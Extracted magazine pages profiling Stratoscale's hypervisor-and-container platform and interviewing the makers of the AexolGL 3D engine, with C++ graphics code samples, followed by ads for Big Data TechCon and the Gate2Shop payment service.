KVM and Xen. These hypervisors — the software that provides the virtualization functionality — are responsible for emulating the 
physical server hardware, namely the processor, memory, and networking. In addition, they enable the simultaneous operation of 
multiple operating systems (referred to as virtual machines) and their applications. 


While cost savings often drive virtualization projects initially, enterprises and service providers alike now depend on virtualization for 
their public and private cloud infrastructure because of the flexibility and security it provides. 


Recently, however, an emerging technology has been attracting tremendous interest as an alternative to traditional virtualization
technology: Containers. While currently only available for Linux-based environments, containers resolve some of the problems
typically associated with hypervisors and virtual machines. Because of their fundamentally different architectures, containers do not
require a hypervisor and therefore provide better performance than applications running in virtual machines. This same architectural
difference also results in faster provisioning of resources and quicker availability of new application instances. For organizations
embracing a DevOps culture, this is a great fit, allowing development teams to streamline their develop-test-production processes.

But containers are not a silver bullet for all IT infrastructure needs. While they are a perfect fit for deploying homogeneous workloads
(and similar types of workloads) like web applications at scale, container workloads on the same physical server share a single
operating system and are therefore less appropriate for multi-tenant environments because of potential security risks.


Do we really have to choose? Stratoscale allows you to run both containers and VMs on the same infrastructure. 


Hypervisors and containers are great technologies that each have a place in the data center. The challenge is how to manage these 
two vastly different architectures within a single infrastructure, instead of as individual silos within the data center. 


Stratoscale has developed a radically new approach that efficiently scales both virtualized and container-based workloads across a
single, scale-out infrastructure, allowing enterprises and service providers to compete more efficiently through predictable
performance and better economics.


The Founders 


Ariel Maislos (CEO) brings over twenty years of technology innovation 
and entrepreneurship to Stratoscale. After a ten-year career with the IDF, 
where he was responsible for managing a section of the Technology 
R&D Department, Ariel founded Passave, now the world leader in FTTH 
technology. Passave was established in 2001, and acquired in 2006 by 
PMC-Sierra (PMCS), where Ariel served as VP of Strategy. In 2006 Ariel 
founded Pudding Media, an early pioneer in speech recognition tech- 
nology, and Anobit, the leading provider of SSD technology acquired by 
Apple (AAPL) in 2012. At Apple, he served as a Senior Director in charge 
of Flash Storage, until he left the company to found Stratoscale. Ariel is a 
graduate of the prestigious IDF training program Talpiot, and holds a BSc 
from the Hebrew University of Jerusalem in Physics, Mathematics and 
Computer Science (Cum Laude) and an MBA from Tel Aviv University. He 
holds numerous patents in networking, signal processing, storage and 
flash memory technologies. 


Etay Bogner (CTO) brings over twenty years of technology innovation 
and entrepreneurship to Stratoscale. After eight years of working for sev- 
eral technology R&D startups, in 1999 Etay founded SofaWare, a Net- 
work Security company building firewall, VPN and networking applianc- 
es. SofaWare was acquired by Check Point (CHKP) in 2011. In 2006, Etay 
founded Neocleus, building the first client virtualization product, and 
pioneering device pass-through technologies. Neocleus was acquired 
by Intel (INTC) in 2010. Etay served as a strategist for Intel, commercial- 
izing client virtualization, before leaving the company to found Strato- 
scale. Etay holds a BSc from Tel-Aviv University in Computer Science and 
Mathematics. 


The Team

Stratoscale's added value is its founding team, which includes some of the most sought-after talent in the industry: a group that
brings to the table prior experience at companies including IBM, Oracle, SAP, Cisco, Google, Apple, VMware and Red Hat. The company
currently has the backing of first-class investors such as Battery Ventures, Bessemer Venture Partners, Intel Capital, Cisco and SanDisk.

AexolGL - New 3D
Graphics Engine


Aexol specialises in creating mobile applications. 


It was created by Artur Czemiel, a graduate of the
DRIMAGINE 3D Animation & VFX Academy, who has
a lifelong interest in 3D technology. He first started
to realise his passion by working in the film industry.


Artur is the co-creator of the special effects in the
Polish production “Weekend” and the short film
“Hexaemeron”, which was awarded the Finest Art
award at the Fokus Festival and nominated as the
best short animated film at fLEXiff 2010 Australia.
The experience gained by working in the movie
industry and on the mobile applications market was
the basis for creating AexolGL, a tool designed to
make work easier for Aexol and other programmers
around the world.


What is AexolGL? 

AexolGL is a set of tools for creating visualisations, ap- 
plications and 3D games with little workload. The user 
doesn't have to worry about things like differences be- 
tween OS's or hardware. AexolGL lets you focus on the 
key elements and appearance of the end product (appli- 
cation, game) instead of worrying about technical details. 


What was the main objective and the main 
incentive to create the engine? 

We wanted to create a tool for small/medium-sized devel- 
oper studios, indie developers, that would let them design 
3D projects on any platform they want. 


Why create two different engines? 
AexolGL PRO is a tool for creating games and applications
natively in C++/Python, for the following platforms: iOS,
Android, Windows, Mac, and Linux. AexolGL WEB is used
to create games and applications for internet browsers
(Mozilla, Safari, Chrome) without the need to use plugins,
as well as simple webview apps and games for iOS and Android.

Photo: AexolGL team


Is AexolGL a tool only for creating games and 
mobile applications? Will it find uses in other 
fields? 

AexolGL WEB is a perfect tool for creating visualiza- 
tions. 3D technology is the modern form of presentation, 
that works perfectly for visualizing interiors, buildings 
and product models (e.g. cars and electronic devices). 
AexolGL takes website product presentation to a whole 
new level. 


Will displaying a lot of 3D graphics in the web 
browser slow the user’s computer (AexolGL WEB)? 
Most certainly not! The web engine handles displaying 3D 
very well, even on machines using integrated graphics. 
Deferred shading technology handles creating complicat- 
ed lighting models without overly taxing the hardware. 


Why use Python (AexolGL PRO)? 

Python is an easily adaptable scripting language. Being in 
line with the idea behind the engine itself (quick program- 
ming), it allows rapid prototyping of applications. Python’s 
module structure allows the addition of many prepared li- 
braries, which help make the programmer's work easier. 


How are different scenes, models etc. imported 
into the engine? 

We have integrated the ASSIMP library with our engine, 
which allows the import of about 20 different formats. 
However, because it is constantly being expanded, that 
number will increase over time. 


What can you say about the engine structure? 
One of the main efficiency problems that appear when 
creating 3D projects are context changes. To minimize 
the number of costly changes, while not forcing the ob- 
ject sorting order, we created a RenderTree, which makes 
sure that operations are not repeated and are executed in 
the correct order. 
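
The benefit of grouping draws under shared state can be shown with a minimal, self-contained sketch. This is not AexolGL's RenderTree: the DrawCall struct, the integer ids and all three functions are hypothetical names chosen for illustration, and a two-level std::map stands in for whatever structure the engine really uses. Objects keep their submission order inside each state group, so no per-object sorting is imposed.

```cpp
#include <cassert>
#include <cstddef>
#include <map>
#include <vector>

// Hypothetical draw request: the state an object needs, plus its id.
struct DrawCall {
    int shader;    // illustrative shader id (non-negative)
    int material;  // illustrative material id (non-negative)
    int object;    // illustrative object id
};

// Count shader/material binds when the calls are walked in order and state
// is rebound only when it differs. A shader switch forces a material rebind.
inline std::size_t countStateChanges(const std::vector<DrawCall>& calls) {
    std::size_t changes = 0;
    int shader = -1, material = -1;  // -1 means "nothing bound yet"
    for (const DrawCall& c : calls) {
        if (c.shader != shader) { shader = c.shader; material = -1; ++changes; }
        if (c.material != material) { material = c.material; ++changes; }
    }
    return changes;
}

// Two-level tree: shader -> material -> objects in submission order.
typedef std::map<int, std::map<int, std::vector<int> > > StateTree;

inline StateTree buildTree(const std::vector<DrawCall>& calls) {
    StateTree tree;
    for (const DrawCall& c : calls) {
        assert(c.shader >= 0 && c.material >= 0);
        tree[c.shader][c.material].push_back(c.object);
    }
    return tree;
}

// Walk the tree depth-first so that every state node is visited exactly once.
inline std::vector<DrawCall> flatten(const StateTree& tree) {
    std::vector<DrawCall> out;
    for (const auto& s : tree)
        for (const auto& m : s.second)
            for (int object : m.second)
                out.push_back({s.first, m.first, object});
    return out;
}
```

For five draws that alternate between two shaders and two materials, walking the tree instead of the submission order reduces the number of binds in this model from 10 to 6.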


Does the engine give the user the ability 

to implement individual solutions? 

Yes, we let the user create personal solutions, write cus- 
tom shaders or effects needed for specialised tasks. 


Are there any similar products already on 

the market? What makes AexolGL stand out 
(specifically in terms of functionality) in the 
field of available solutions? 

AexolGL is primarily a tool for small and medium-sized 
projects, that lets you rapidly prototype and preview them. 
We do not aim to compete with the big engines. Ours is 
one of the select few that works on all platforms and has a 
web counterpart with a similar RenderTree structure. 


Are there any examples available? It seems 

that currently there aren't any games or, more 
importantly, a tech demo of the engine created 
with AexolGL available on the website. 

We are currently putting the finishing touches on our prod- 
uct and the website. Soon gl.aexol.com will host the first 
examples showcasing the possibilities of AexolGL WEB 
as well as the first game for mobile devices created with 
our technology, called Gravity: Planet Rescue. 


aex::Visual_ptr LvLStarRating::makeStarPuffVisual() {
    // Render node that will hold the shader and the sprite.
    aex::Visual_ptr ret = aex::ObjectRenderNode::MakeRenderNode();
    aex::ShaderDrw_ptr shader = LvLStarRating::PuffSprite();

    // Animated sprite whose frames are described in a JSON file.
    aex::SpriteAnimated_ptr asprite = aex::make_shared<aex::SpriteAnimated>();
    asprite->LoadAnimationsFromFile("Data/Asprite/puff.json");
    asprite->setCanChangeDepthTestState(true);
    asprite->setCanChangeBlendState(true);
    asprite->setAnchorCenter();
    asprite->scaleVerts(15.0f);

    ret << shader << asprite;
    return ret;
}


An animated sprite object loaded from a JSON file, ready for instantiation (C++)

Does the engine use optimization algorithms,
like occlusion culling, or others such as
those found in Umbra technology?

The engine does have the most popular optimization algo- 
rithms available. Although not as advanced as Umbra’s, 
they certainly increase the efficiency of the application. 
As we expand the engine we will certainly further improve 
this system. 


What kinds of lighting algorithms are available 
in the engine? Does it support lightmapping 

or global illumination? Do you plan on 
including realtime global illumination shaders? 
We are constantly working on scene lighting. Ultimately
it will be one of the advantages of LightRig technology,
which creates a compact lighting model out of the environment
map, giving the illusion of GI. Currently the engine is
equipped with several types of lighting and supports
shadow mapping.


How does the engine model terrain? Do you 
plan on using voxels? Can you create 
heightmap based terrain? 

Heightmap based terrain creation is already available. It's 
actually a very convenient and practical tool useful in a 
majority of projects. A voxel version might be implemented 
as well in the future. 
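
As a rough illustration of what heightmap-based terrain involves, the sketch below turns a grid of height samples into a triangle mesh. It does not use the AexolGL API: Vertex, TerrainMesh, buildTerrain and the cellSize and heightScale parameters are all hypothetical names, and the triangle winding would have to be adapted to the conventions of the renderer in use.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

struct Vertex { float x, y, z; };

struct TerrainMesh {
    std::vector<Vertex> vertices;   // one vertex per height sample
    std::vector<unsigned> indices;  // two triangles per grid cell
};

// heights: row-major samples, width * depth of them.
// cellSize: horizontal spacing between samples; heightScale: vertical scale.
inline TerrainMesh buildTerrain(const std::vector<float>& heights,
                                std::size_t width, std::size_t depth,
                                float cellSize, float heightScale) {
    assert(width >= 2 && depth >= 2);
    assert(heights.size() == width * depth);

    TerrainMesh mesh;
    mesh.vertices.reserve(width * depth);
    for (std::size_t z = 0; z < depth; ++z) {
        for (std::size_t x = 0; x < width; ++x) {
            Vertex v;
            v.x = static_cast<float>(x) * cellSize;
            v.y = heights[z * width + x] * heightScale;
            v.z = static_cast<float>(z) * cellSize;
            mesh.vertices.push_back(v);
        }
    }

    // Split every grid cell into two triangles that share a diagonal.
    for (std::size_t z = 0; z + 1 < depth; ++z) {
        for (std::size_t x = 0; x + 1 < width; ++x) {
            const unsigned i0 = static_cast<unsigned>(z * width + x);
            const unsigned i1 = i0 + 1;
            const unsigned i2 = i0 + static_cast<unsigned>(width);
            const unsigned i3 = i2 + 1;
            const unsigned quad[6] = {i0, i2, i1, i1, i2, i3};
            mesh.indices.insert(mesh.indices.end(), quad, quad + 6);
        }
    }
    return mesh;
}
```

The height samples would typically come from the pixels of a grayscale image; loading that image is left out here to keep the sketch self-contained.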


void DropyGuy::initVisual(aex::DrawNode_ptr root) {
    LOG("DropyGuy::initVisual");

    // Shader built from the droplet vertex and fragment sources.
    aex::shared_ptr<aex::ShaderDrw> shadertxtptr = aex::make_shared<aex::ShaderDrw>(
        aex::LoadShaderFromFile("Data/Shaders/Droplet.vert",
                                "Data/Shaders/DropletTextured.frag"));
    shadertxtptr->setCameraPosNeeded(true);

    // Animated geometry imported from file.
    aex::ReadFromAexFile reader;
    aex::AnimationDrwPtr anim = aex::AnimationDrw::makeAnimationDrw();
    reader.ImportFromAexFile("Data/Geometry/droplet.gex", *anim);
    anim->buildPerFacePerVertexNormals();
    aex::DrawObject_ptr animMesh = anim->GetAnimatedMesh();

    // Material with a diffuse texture.
    aex::TextureManager& tm = aex::TextureManager::GetInstance();
    aex::MaterialShrd_Ptr material = aex::make_shared<Material>(true);
    material->setColor(0.0, 0.0, 0.0);
    material->useDiffuse(true);
    material->setDiffuse(*tm.GetTexture("Data/dropletColorMask.png"));

    // Transformation: place the object on a circle, then scale and rotate it.
    aMath::Vector2 circle = aMath::Math::point_on_circle(m_angle + 180.0f, m_dropyOffset);
    m_gridOffset.x = circle.x;
    m_gridOffset.z = circle.y;

    m_aex->move(m_gridOffset.x, 0.0, m_gridOffset.z);
    m_aex->scaleUniform(0.07f);
    m_aex->rotate(-110.0f, 180.0f, 0.0f);
    m_timefloat = aex::make_shared<UniformFloat>(0.0f, "time");
    m_aex->getUniforms().push_back(m_timefloat);
    m_visual << shadertxtptr << material << animMesh << m_aex;
    m_visual.SetRootRenderNode(root);
    m_visual.StartDrawing();
}

A simple way of creating objects with assigned materials, shaders, geometry and transformation matrices. In AexolGL the object is ready for display after only 30 lines of code (C++)


To my understanding, the engine provides
a joint interface that lets users create
applications that work under both, for
example, Windows and Android. How does it
handle the fundamental difference in controls
(desktop: mouse and keyboard; mobile
devices: touchscreen)?

We give the developer the ability to define controls on
keyboard, joystick, mouse, and touchscreen. It is also
possible to define a virtual joystick on the touchscreen.
However, how the application reacts to individual signals
is entirely up to its creator. By default, signals from the
mouse and one-finger touches are treated the same;
however, they can easily be assigned to different actions.
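
The default described in this answer (mouse and one-finger touch handled alike, with the option to separate them later) can be sketched as a small binding table. Everything here is an assumption made for illustration: InputSource, InputMap and its methods are hypothetical and are not taken from the AexolGL API.

```cpp
#include <cassert>
#include <functional>
#include <map>
#include <utility>

// Hypothetical input sources; a real engine would expose many more.
enum class InputSource { MouseButton, SingleTouch, KeyPress };

class InputMap {
public:
    typedef std::function<void(float, float)> Action;  // receives x, y

    // Bind one source to an action; rebinding replaces the previous action.
    void bind(InputSource source, Action action) {
        actions_[source] = std::move(action);
    }

    // Default behaviour: mouse clicks and one-finger touches share a handler.
    void bindPointer(const Action& action) {
        bind(InputSource::MouseButton, action);
        bind(InputSource::SingleTouch, action);
    }

    // Run the action bound to the source; returns false if none is bound.
    bool dispatch(InputSource source, float x, float y) const {
        std::map<InputSource, Action>::const_iterator it = actions_.find(source);
        if (it == actions_.end() || !it->second) return false;
        it->second(x, y);
        return true;
    }

private:
    std::map<InputSource, Action> actions_;
};
```

An application would call bindPointer once for the shared behaviour and later call bind for InputSource::SingleTouch alone if touch should trigger a different action than the mouse.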


How about the significant difference 

in computing power between desktops 

and smartphones? 

Obviously smartphones have less computing power
than desktops; however, how an application performs on
mobile platforms depends primarily on its design and,
for our users, on the help of our efficient solutions.


In the currently available version of AexolGL
WEB, you used the K-3D library, licensed under
the GNU GPL. Why wasn’t this fact mentioned on
the product page? Are the licenses compatible?
The K-3D library is not used in the current version of the
engine. The file-loading mechanisms employed by K-3D
are obsolete and do not support usemtl.


Is AexolGL only a graphics engine or does
it also handle other aspects of game creation
(physics, optimal resource management,
AI, etc.)?

Aside from the graphics engine itself, our
framework also supports optimal, multi-threaded
resource management. We introduced
a simple system of creating multiple
threads in an application and solved the
problem of file loading on different platforms
as well. For mobile platforms, we
prepared a suitable small format for saving
3D geometry. Additionally, our engine
easily integrates with available physics
engines (for example, the popular Bullet
Physics). The engine also has an integrated
mathematical library equipped with the most needed
functions for 3D applications: 2D/3D vector math,
transformation matrices and quaternions, as well as countless
additional instruments, e.g., color conversions, an easing
function library, Bezier and Catmull-Rom curves, and the
ability to create simple parameterized geometry (cubes,
spheres, cylinders).
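
Of the math helpers listed in this answer, the spline curves are the easiest to show in a few lines. The sketch below evaluates one segment of a uniform Catmull-Rom spline, on the assumption that this is the curve type meant; Vec2 and catmullRom are hypothetical names and do not come from the engine's math library.

```cpp
#include <cassert>

struct Vec2 { float x, y; };

// One segment of a uniform Catmull-Rom spline. The curve runs from p1 (t = 0)
// to p2 (t = 1); p0 and p3 are the neighbouring control points that shape
// the tangents at both ends.
inline float catmullRom(float p0, float p1, float p2, float p3, float t) {
    assert(t >= 0.0f && t <= 1.0f);
    const float t2 = t * t;
    const float t3 = t2 * t;
    return 0.5f * ((2.0f * p1) +
                   (-p0 + p2) * t +
                   (2.0f * p0 - 5.0f * p1 + 4.0f * p2 - p3) * t2 +
                   (-p0 + 3.0f * p1 - 3.0f * p2 + p3) * t3);
}

// The same interpolation applied to each component of a 2D point.
inline Vec2 catmullRom(const Vec2& p0, const Vec2& p1,
                       const Vec2& p2, const Vec2& p3, float t) {
    Vec2 r;
    r.x = catmullRom(p0.x, p1.x, p2.x, p3.x, t);
    r.y = catmullRom(p0.y, p1.y, p2.y, p3.y, t);
    return r;
}
```

Unlike a Bezier curve, this spline passes through its control points, which makes it convenient for camera paths and object motion defined by a list of waypoints.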


What are the similarities and differences between
your product and the biggest player, Unity 3D? What
is the niche for AexolGL in a market with a free
Unity 3D?

It’s difficult for us to compare with Unity. The idea behind 
our engine is completely different. We're not targeting the 
biggest studios with complicated and high-budget proj- 
ects. Our aim is to let small and medium-sized studios 
benefit from a quick and simple tool that will let them begin 
their journey into the world of 3D games and applications 
without straining their budget. Obviously we will also con- 
tinue to work on our project, extending its capabilities and 
broadening its use. Additionally, if we take a closer look at
the free version of Unity 3D, we can see that access to
many useful functions, such as Static Batching,
Render-to-Texture Effects, Full-Screen Post-Processing Effects or
GPU Skinning, is only available in the paid PRO version.


Does your product benefit from the new 
possibilities available in OpenGL 4? 
OpenGL 4 is currently only available on
PC. Because a lot of mobile devices still
use OpenGL ES 2.0, our engine is compatible
mainly with that API version. However, thanks
to the high flexibility of the engine, introducing
OpenGL 4 would not be a problem. Users of the
AexolGL Lab have the ability to independently
adapt the engine to OpenGL 4 thanks to the
GL abstraction.

WWW.NETOPENSERVICES.COM • CONTACT@NETOPENSERVICES.COM


People are talking about
Big Data TechCon!


April 26-28, 2015


Seaport World Trade Center Hotel


“Big Data TechCon is a great learning 
experience and very intensive.” 


- Huaxia Rui, Assistant Professor,
University of Rochester

“Get some sleep beforehand,
and divide and conquer the packed
schedule with colleagues.”
- Paul Reed, Technology Strategy & Innovation, FIS

Choose from 55+ classes and


Big Data TechCon is the HOW-TO technical conference 
for professionals implementing Big Data solutions 
at their company 


Come to Big Data TechCon to learn the best ways to: 


Process and analyze the real-time data pouring into your organization 


fresh air.” 
—Julian Gottesman, ClO, DRA Imaging 


Learn how to extract better data analytics and predictive analysis 
to produce the kind of actionable information and reports your 
organization needs. 


Come up to speed on the latest Big Data technologies like Yarn, Hadoop, 
Apache Spark and Cascading 


Understand HOW to leverage Big Data to help your organization today 


“Big Data TechCon is definitely worth the
investment.”


- Sunil Epari, Solutions Architect, Epari Inc.
Big Data TechCon is a trademark of BZ Media LLC.


Meet the 
Developer-Friendly 
Payment Solution 


Payment page
With Gate2Shop, you can optimize your payment pages by using
ready-made templates or by customizing payment pages to your
site's look and feel.

Conversions
An effective payment page variant testing tool, A/B Testing helps you
gain insight into user behaviour and increase payment conversion in the
short and long term.

Payment flow
With dozens of alternative and local payment methods offered in
multiple currencies, the personalized checkout allows you to reach
users from all around the world.


Easy integration
Cross-platform
Secure

Sell. More.


Call for a free consultation: +44 20 3051 0330
www.g2s.com


